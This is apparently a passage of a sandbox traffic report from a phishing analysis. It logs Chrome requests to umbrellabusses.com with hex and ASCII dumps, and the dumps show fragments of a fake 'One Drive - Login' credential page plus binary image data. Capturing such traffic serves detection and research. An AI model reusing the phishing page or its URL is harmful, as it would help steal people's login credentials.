                                                                                                                                                                                                                        Data Ascii: Xn6'w%_XYexuhv,?uTY,K]|jN?9<GWuzSxI\jZ7;YI;=&>CIdE'gGGGchw..nvGcK{];LS]5`rBe?M=(>Cf'dav?)>CM4;
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: d7 4d 00 2b b5 87 49 e5 9d ff 17 a3 eb 53 56 26 fd 8e 77 ee 60 1d b4 9f 7d 56 75 fa c7 f8 49 bf b6 c9 37 01 7f 6a 47 c1 f7 cc 8e fa fd f6 57 23 d1 75 29 2b e7 69 fa 6d cd 1f d6 41 fb 80 93 bc 08 be 3f 7a d2 af 5f d2 c5 ed 89 86 d1 d7 9d 58 83 ba 37 93 1b cd 97 e2 eb 51 56 cc cf 0b a2 6b 03 26 46 5e 04 5f 1b 3f e9 d7 7d 91 f9 8b f6 80 a3 e8 6b 4f 8c aa 99 de 56 d6 e9 eb f1 75 28 2b f2 4b d1 b5 01 13 a3 fd fc 73 9c 3f f7 bf b7 e4 1b 9f f7 ec d8 7d ea 03 a2 c7 80 f5 35 3b ea 9f 51 d5 e9 da e8 fa 93 03 e6 e3 6b a3 6b 03 26 ca 64 bd f5 7f b7 59 70 ac e8 e4 68 4f 88 cc cd ff fa 0e d4 9d 7c 2f 75 71 7b fe cf 57 47 d7 06 4c 94 b2 e9 9d 15 3e f9 bb 90 3a 35 c3 2b 7b 0f 8a 1e 0f d6 d6 9d 0f b3 ba 31 bc de e4 ae b4 cf 17 19 d4 e9 3f 46 d7 06 4c 9c 3c 01 af 8a 5e 00
                                                                                                                                                                                                                        Data Ascii: M+ISV&w`}VuI7jGW#u)+imA?z_X7QVk&F^_?}kOVu(+Ks?}5;Qkk&dYphO|/uq{WGL>:5+{1?FL<^
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: e6 1b 9f ef 86 5f 77 59 9a 7d 55 dd 7b 65 74 6d 00 eb a8 6d 3e 1d 58 7c 64 42 9e a7 5e 36 bd b3 f2 6b bd a9 03 d7 5b fe 39 b9 f9 17 2f 8b ae 0d 60 9d 95 4d 7a 7e 07 16 20 69 16 bf 75 fd 91 f6 59 0d d1 35 b1 56 f2 cd e6 8b f3 6b bc 35 fa 3a cb 92 9a ab d3 cd ed 1a 10 5d 1b 40 84 fd 53 47 55 4d fa 40 f4 42 24 77 a6 4e 9f da b9 3b 3d 26 ba 2c 56 db 5c d3 fb 19 cd bf 73 b9 a9 5c 28 fe 6d 74 6d 00 81 aa 7a ba f0 99 6c 97 92 be 70 fe 42 b1 39 ba 2e 56 4b 7e 3d db db 2f 98 c5 5f 57 f9 5e da 2f 60 b6 5f c4 8c ae 0d a0 03 f2 22 fd cb d1 8b 92 2c 4d fa 42 ce 96 e8 ba 38 52 f9 b5 bc da a9 93 1d 4b 9d ae 2f 17 d2 d3 a3 6b 03 e8 88 f6 8c fa bc 2b a8 c3 17 27 59 92 f4 e5 b9 66 eb e3 a3 6b e3 70 0d ea 62 2e fe 1a ca 8a 7c ab 1a 6d 7d 6a 74 6d 00 1d d3 3e 83 dd 79 ec dd
                                                                                                                                                                                                                        Data Ascii: _wY}U{etmm>X|dB^6k[9/`Mz~ iuY5Vk5:]@SGUM@B$wN;=&,V\s\(mtmzlpB9.VK~=/_W^/`_",MB8RK/k+'Yfkpb.|m}jtm>y
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: a8 6c d2 ad d1 8b b7 c8 91 24 d7 f0 a7 e7 e6 7b a7 46 cf 27 80 0d a5 6a fa 67 57 75 ba 25 7a 11 17 39 9c e4 9d ff 27 67 47 fd 47 47 cf 23 80 0d 69 6e 21 fd 84 27 d6 c9 46 4b 59 17 1f 1a d4 bd 87 47 cf 1f 80 0d ad aa 8b 1f cb f9 4e f4 a2 2e 72 70 49 7b aa ab a6 1f 1a 3d 6f 00 c6 42 b9 90 9e 5e d5 e9 fa f8 c5 5d e4 9e 53 36 69 34 bc b2 f7 a0 e8 f9 02 30 56 06 75 f1 23 65 5d 5c 17 bd c8 8b dc 43 16 66 47 fd 93 a2 e7 09 c0 58 aa 9a e9 6d 65 9d be de 81 c5 5e e4 ae e4 9d ff 7b 76 ec 3e f5 01 d1 f3 03 60 ac ed 1c a5 ef 2f 9b e2 9f a2 17 7d 91 3b f3 97 c3 f9 4d c7 47 cf 0b 80 89 30 77 79 7a 5c 55 a7 7f ec c0 e2 2f 13 9d 74 f1 f6 3d db 8e 89 9e 0f 00 13 a5 aa a7 8b bc 08 ff 43 7c 13 90 09 cd db 87 f3 67 de 3f 7a 1e 00 4c a4 72 be ff d8 b2 2e fe be 03 cd 40 26 2a
                                                                                                                                                                                                                        Data Ascii: l${F'jgWu%z9'gGGG#in!'FKYGN.rpI{=oB^]S6i40Vu#e]\CfGXme^{v>`/};MG0wyz\U/t=C|g?zLr.@&*
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC637INData Raw: 5e 33 5f 3c 2c fa 7a 03 40 67 ec 5c d8 fa a4 f6 ad f1 f8 26 bd 46 3b ff 3a bd ad 7d 46 42 f4 75 06 80 ce 69 77 c7 b9 51 be 33 ba 59 af 6a ea e2 3b 1e e7 0b 00 07 a1 6c d2 cb ef 38 19 af 03 0d fc c8 9a ff 5e df f4 07 80 43 30 d7 6c 7d 7c 59 a7 cb c2 9b f8 e1 ee fa eb f4 2b de f2 07 80 c3 54 36 bd b3 ca 26 7d 3e bc a9 1f 64 ca a6 78 f7 f9 0b c5 e6 e8 eb 06 00 1b de 8e dd a7 3e 20 37 d6 aa 6a d2 97 a3 1b fc 3d 36 fe 3a 5d 36 a8 7b 67 46 5f 2b 00 18 3b c3 bd 33 c7 b6 df 0f c8 0d f7 13 d1 0d ff 8e a6 5f dc d6 ee f8 9d e5 0f 00 eb a0 7d bc 70 55 17 3f 96 f3 d6 88 f3 03 f2 6e ff 63 f9 46 e4 b5 e5 7c ff b1 d1 d7 02 00 26 d2 70 7e d3 f1 83 26 fd bb f6 66 a0 6a d2 17 d6 a8 e1 df dc 1e e2 d3 7e b1 6f b0 6b fa 09 d1 af 19 00 58 a1 6c b6 9c 96 6f 06 5e 56 d6 c5 1b 73
                                                                                                                                                                                                                        Data Ascii: ^3_<,z@g\&F;:}FBuiwQ3Yj;l8^C0l}|Y+T6&}>dx> 7j=6:]6{gF_+;3_}pU?ncF|&p~&fj~okXlo^Vs
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        71192.168.2.549975104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC948OUTGET /samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440 HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/auth/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC866INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:05 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2BCxDTqcl9%2Bp1xH1t8iXLJONVqNNYhgZvv%2F%2FqBy4dfDikrLNjYBlHsEkALCauQSUchQFAL2B%2Fj35ai1J0OblAiseg9x5rGB6DnIptADkQpxJHw5CLhsGWjjF%2BAk5rXtzqqkW3kM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26ba2d3b42da-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1569&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1526&delivery_rate=1810291&cwnd=227&unsent_bytes=0&cid=7dd8eb0bd0bcf419&ts=303&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC503INData Raw: 65 63 38 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 44 72 69 76 65 20 2d 20 4c 6f 67 69 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2e 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c
                                                                                                                                                                                                                        Data Ascii: ec8<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>One Drive - Login</title> <link rel="stylesheet" href="../css/main.css"> <styl
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: 43 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 42 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6e 66 69 72 6d 20 59 6f 75 72 20 49 64 65 6e 74 69 74 79 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 42 6f 78 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 43 6f 6e 70 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 59 6f 75 20 68 61 76 65 20 72 65 63 65 69
                                                                                                                                                                                                                        Data Ascii: Container"> <div class="conBox"> <h1>Confirm Your Identity</h1> </div> <div class="conBox2"> <div class="textConp"> <p>You have recei
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 43 6c 69 63 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 42 79 20 43 6c 69 63 6b 69 6e 67 20 4e 65 78 74 2c 20 79 6f 75 20 61 72 65 20 67 72 61 6e 74 69 6e 67 20 4f 6e 65 44 72 69 76 65 20 74 68 65 20 50 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 75 73 65 20 79 6f 75 72 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 20 69 6e 20 6c 69 6e 65 20 77 69 74 68 20 74 68 65 69 72 20 70 72 69 76 61 63 79 20 73 74 61 74 65 6d 65 6e 74
                                                                                                                                                                                                                        Data Ascii: </form> </div> <div class="boxClick"> <p>By Clicking Next, you are granting OneDrive the Permission to use your email address in line with their privacy statement
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC550INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 42 6f 78 73 70 61 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 46 6f 72 67 6f 74 20 70 61 73 73 77 6f 72 64 3f 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 42 6f 78 73 70 61 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 46 6f 72 67 6f 74 20 75 73 65 72 6e 61 6d 65 3f 3c 2f 73 70 61 6e
                                                                                                                                                                                                                        Data Ascii: </div> </div> <div class="inpBoxspan"> <span>Forgot password?</span> </div> <div class="inpBoxspan"> <span>Forgot username?</span
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        72192.168.2.549976104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC624OUTGET /samhentir/img/log.png HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/css/main.css
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC999INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:05 GMT
                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:17:22 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675ef302-1f68"
                                                                                                                                                                                                                        Expires: Thu, 06 Feb 2025 10:58:04 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 269701
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7pEtULE6kl399ogeGP0SgduhRLgjEwX8FyuKc2ruARVNfPGwHXKPlMzqT7GUagYaPTShixxkkn1KSuOFN%2BmSsV34dg6KMdqncg8klNdHkNW2wCQK1tfg4ALq%2FZHDWhpwP%2BTl%2F8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26ba3e744225-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1719&rtt_var=674&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1202&delivery_rate=1587819&cwnd=235&unsent_bytes=0&cid=353392c35baebd3a&ts=144&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC370INData Raw: 31 66 36 38 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 52 00 00 00 65 08 06 00 00 00 de 53 b4 8e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 1f 22 49 44 41 54 78 5e ed 9c 79 98 5c 55 99 ff bf 67 b9 5b 6d bd 26 e9 44 08 24 64 23 1b 24 84 25 40 4c c2 32 c1 80 20 8e 04 45 18 7c 20 e3 fc a2 e3 32 a8 30 2c c9 e8 38 b8 8d 83 8a fe 18 70 10 44 87 61 9f 8c 30 8a 8e 90 c8 4f d9 21 80 24 6c 01 42 12 42 02 9d a5 bb 6b bb db 39 67 9e f7 dc 6a 60 9c 87 9f d5 49 35 f2 47 d7 f3 74 aa 53 75 eb d6 bd 9f fb 2e df f7 3d ef 6d 86 91 47 4b 08 b0 96 ec 65 64 27 18 01 d9 22 23 18 01 39 02 b2 45 04 5a b4 9b 11 8b 1c 01 d9 22 02 2d da cd 88 45 8e 80 6c 11 81 16 ed 66 c4 22 47 40 b6 88 40 8b 76 33 62 91 23 20 5b 44 a0 45 bb 79 cf 5a e4 ad c6 88 89 8f 83 97 0f
                                                                                                                                                                                                                        Data Ascii: 1f68PNGIHDRReSsRGB"IDATx^y\Ug[m&D$d#$%@L2 E| 20,8pDa0O!$lBBk9gj`I5GtSu.=mGKed'"#9EZ"-Elf"G@@v3b# [DEyZ
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: 4b 27 b3 de 7d 38 f7 96 7e f4 4f 0e 72 e5 0f d6 7d e5 f1 0d 2f af da b5 bb 82 42 71 14 98 0c 00 f8 60 8e 87 44 19 30 c1 e1 e7 3c a4 aa 0e 23 34 1c d7 20 8e eb e8 6c 2f 61 ce b4 f1 2b 2f fe 50 d7 e5 ef 05 b7 ff 93 81 fc f5 6f 6b e3 7f 76 f7 bd b7 fc 7e d3 ae a3 42 6b 7d 25 38 5e 1e 4a 33 70 37 80 e3 7a 48 0c 60 98 86 0c 5c 28 10 54 c0 0b 5c c4 71 0c 63 0c ba db 5d 74 ba b5 de f7 1f 31 6b e9 c7 8e 74 1f 6b a9 89 0d 71 67 ef 3a 48 63 8c f8 f1 2d 5b cf 58 73 cf 6f be b5 6d 57 65 ff 01 25 e0 e6 3b e1 07 05 68 48 18 08 08 2f 07 48 89 58 a5 f0 72 01 84 23 ac 8b 83 1b b8 be 03 c6 98 7d 0f 2c 81 e7 68 b8 a8 61 d6 81 e3 7e 75 e4 cc 83 3e 76 ca 6c b6 67 88 0c 5a b2 f9 bb 0a 72 cd 1d bd 27 3f f1 ca 96 e5 db 76 0e 2c dc f0 cc c6 8e de 72 15 85 51 3d 50 8e 0b 18 01 e6
                                                                                                                                                                                                                        Data Ascii: K'}8~Or}/Bq`D0<#4 l/a+/Pokv~Bk}%8^J3p7zH`\(T\qc]t1ktkqg:Hc-[XsomWe%;hH/HXr#},ha~u>vlgZr'?v,rQ=P
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: 24 b8 27 ad 45 88 38 81 4e e2 ac 2e f6 5d 30 95 66 28 39 43 5d 18 fc e8 ce 3b 50 f5 98 85 c8 09 9c 57 b0 20 5d 2f b0 ee 2c 24 bd 4e 30 09 24 6f 80 a4 18 99 41 1c 8c 91 24 77 c8 d5 c9 ad 6d 32 6a 00 26 d9 64 2d 93 40 32 63 ad 2f d2 29 94 cd fe 01 1c cf 87 36 0c 2a 51 30 5a a1 e0 32 38 71 0d 25 13 63 fa 98 ce af 7d 7e 4e e9 d2 bd 81 39 24 90 f7 df 1f 1f fa 5f 3f 7f f0 d7 a5 60 6c 37 57 79 48 cd e1 1a 0a e4 0a 31 34 74 92 c2 63 02 39 c7 b3 31 8d aa 10 69 c7 8b e8 64 19 22 09 fc e8 ce db 50 77 19 44 e0 81 f9 3e b8 57 00 77 7d 6b 91 04 92 7e 27 e1 4d 30 6d 8c f4 32 4b a2 20 47 32 e7 0f 41 da a4 c3 15 8c 44 23 f9 d0 33 07 23 9a 5c 80 81 5b d7 a6 0c 9e a6 89 d5 a4 dc 63 10 2e 83 06 83 d2 2e 3a 73 79 e8 de 6d e8 d2 75 b3 68 da a4 29 cb 26 b1 17 87 0a 73 48 20 bf
                                                                                                                                                                                                                        Data Ascii: $'E8N.]0f(9C];PW ]/,$N0$oA$wm2j&d-@2c/)6*Q0Z28q%c}~N9$_?`l7WyH14tc91id"PwD>Ww}k~'M0m2K G2AD#3#\[c..:symuh)&sH
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: 4c 14 5c e3 a2 2d d7 8e 34 26 d5 40 f2 29 03 49 e5 a6 fd b1 52 8a e2 b8 63 1b c7 9e cf a1 92 08 ae 16 e8 a9 d7 70 ea 01 dd 85 25 c3 00 52 5c f0 e5 47 53 ad 3a ad c0 75 e8 c0 a2 08 be e7 d8 e0 6e 75 1a 9c c6 95 49 29 87 bf f9 c3 60 10 d3 95 2e d0 b2 c1 00 56 ff f2 5f 70 fa 47 4f b9 e2 92 cf 1e f7 85 7d 01 f8 87 9f bd fe 25 33 f9 91 57 b6 6c d8 52 a9 39 2c 5f 84 23 73 88 23 5a be f5 1b 9d a2 86 7b 73 82 c8 a1 48 c0 37 3a 45 ca 28 e4 f2 12 71 14 41 c6 c0 b8 24 c2 c7 0e e8 2c 1d 3b 04 09 d4 b4 6b 7f 7e d5 c3 a9 32 5d 90 d2 81 51 9a f4 2f 32 eb 33 19 36 d3 88 39 48 ad 25 52 a2 21 4d 49 20 a9 63 1d a7 0a 5c 56 71 ca b2 43 a7 cc 99 ce 36 b6 12 e2 db f7 75 c2 ca 5b eb a3 67 cf f6 d9 b8 31 e8 0d 43 90 d7 53 93 98 2b 63 55 00 25 a1 ba 4a 6c d5 24 5d 32 04 0d 41 4d
                                                                                                                                                                                                                        Data Ascii: L\-4&@)IRcp%R\GS:unuI)`.V_pGO}%3WlR9,_#s#Z{sH7:E(qA$,;k~2]Q/2369H%R!MI c\VqC6u[g1CS+cU%Jl$]2AM
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: 24 97 5d 31 a5 78 79 b3 df db 34 c8 b5 c6 c8 ff 7b d1 ba 24 92 dd 48 58 d5 4a 19 27 c9 9a 12 b6 49 ca b2 66 2e c5 cb 6c b1 8b de b3 03 8d d6 32 85 a1 ec 49 27 30 00 c1 06 70 f6 39 8b a6 1d 3b 8d 3d 3f 94 03 fd 63 db 3e f8 eb de 45 b7 dc 70 fb 5a 37 0d c0 34 95 b1 1c 11 4d f6 72 8d 04 31 62 15 41 99 14 3a 55 a0 16 aa 56 0a b1 56 a8 98 08 bc 18 60 57 2d c4 eb ae c2 c2 2f 2e c7 98 51 c5 f3 bf 71 68 57 53 2d bd c1 e3 6a 2a 46 ae 5f 6f dc bf fb e9 63 51 5d 74 21 41 08 e9 08 88 84 ea 69 6e cb 2c 2b bc 1b eb d7 19 50 c2 98 75 26 29 e8 57 cb 03 68 2b 78 90 2c 46 1a ed c6 84 03 ba ef 5e b5 62 da 90 3a d0 7f 0c e4 3f 5e f2 b3 de 3d db fb bb 91 48 50 17 9f 16 d2 ad 3d ea 24 4b 34 3a b6 b1 11 4a 43 6b d8 e5 58 6a 56 94 75 68 17 d5 64 2a b0 8d e6 83 8e 9b 83 e3 4e 5e
                                                                                                                                                                                                                        Data Ascii: $]1xy4{$HXJ'If.l2I'0p9;=?c>EpZ74Mr1bA:UVV`W-/.QqhWS-j*F_ocQ]t!Ain,+Pu&)Wh+x,F^b:?^=HP=$K4:JCkXjVuhd*N^
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: 77 14 51 4f 6b 76 bb c5 27 1e 73 d9 27 3e 37 bf f5 95 0d 71 a2 7a fb 7b 5f fa af 34 e4 3d 88 78 60 e7 b6 e9 ea 0d 0e 06 10 98 6c ae 34 bb a3 60 10 28 f5 f8 6c 0c 6b 64 04 02 69 87 06 48 cb 99 18 71 52 87 ef 48 88 54 03 d5 08 b9 34 45 b7 74 71 c4 c4 89 38 a0 ad 0d 1e bd 46 83 a1 9a 66 1a 53 84 2a 46 62 28 13 2b db 89 4a 6a f1 5b ee 4a 0d 0a 43 72 87 dc 34 3b 06 aa a9 07 41 66 af 51 f6 a6 4f 0f c6 d6 4c 65 44 74 fb 05 57 76 86 e8 4b 17 2e ef 9c bd a0 7d 48 b7 e2 35 6d 91 c4 68 c5 8f b7 ae 79 68 fd 1b 8b 43 96 b3 20 63 93 40 51 75 43 1d 1e 8a 91 9a 62 20 3d 53 f2 c9 80 da c4 42 bf db 67 05 46 27 43 b2 83 5c 5c c7 60 5c 23 ad 0c 20 af 0c da 95 c1 bc 09 93 31 7b bf 09 28 6a 01 27 49 61 92 18 49 5c 87 4a ea 76 76 87 f6 45 33 e1 69 4c 50 48 11 50 12 c9 92 0d 59
                                                                                                                                                                                                                        Data Ascii: wQOkv's'>7qz{_4=x`l4`(lkdiHqRHT4Etq8FfS*Fb(+Jj[JCr4;AfQOLeDtWvK.}H5mhyhC c@QuCb =SBgF'C\\`\# 1{(j'IaI\JvvE3iLPHPY
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC833INData Raw: 19 69 9d 8a 06 1a 48 a4 6e 10 55 44 ca 0e c8 93 f9 a8 1a b5 b1 60 dd d0 5a 14 dd b7 48 59 3a 49 ac 6e 24 d1 4d f7 13 66 f2 26 ab d1 33 8b cc 64 d1 a0 86 24 90 b4 0f ab 21 a9 62 b2 2b 87 09 f2 45 bf ef 98 13 8e 3e 6b e9 19 93 f6 4a d6 34 0b 74 58 40 0e 7e f9 f6 17 cd e2 ad 4f f7 5d 56 7d a3 7a 5c dc 17 41 b2 00 46 d0 84 2c 43 48 55 8e 36 70 49 ee 24 b4 38 95 81 a4 0e 08 55 2a 64 a1 31 95 a0 e0 88 49 74 bf ad 5d 36 98 91 6d 85 43 9a d4 15 a8 45 35 28 46 f6 99 58 5d 68 64 8a 99 73 67 7e 7d f9 67 8e bd a4 59 18 fb b2 dd b0 82 a4 03 db b4 c9 f8 6c 07 2e d8 fe f2 8e 73 fb 5e 2f 4f 31 da 45 9c 52 ae a1 a1 01 09 84 75 7b 67 2b f5 30 09 9e d5 92 36 c1 64 e5 20 ad 52 92 ee b3 37 89 0a 81 88 ca 45 9a 82 e3 24 ae 23 7b ee b4 76 4d 37 f1 d1 32 17 41 1c b5 5f e7 d3 27
                                                                                                                                                                                                                        Data Ascii: iHnUD`ZHY:In$Mf&3d$!b+E>kJ4tX@~O]V}z\AF,CHU6pI$8U*d1It]6mCE5(FX]hdsg~}gYl.s^/O1ERu{g+06d R7E$#{vM72A_'
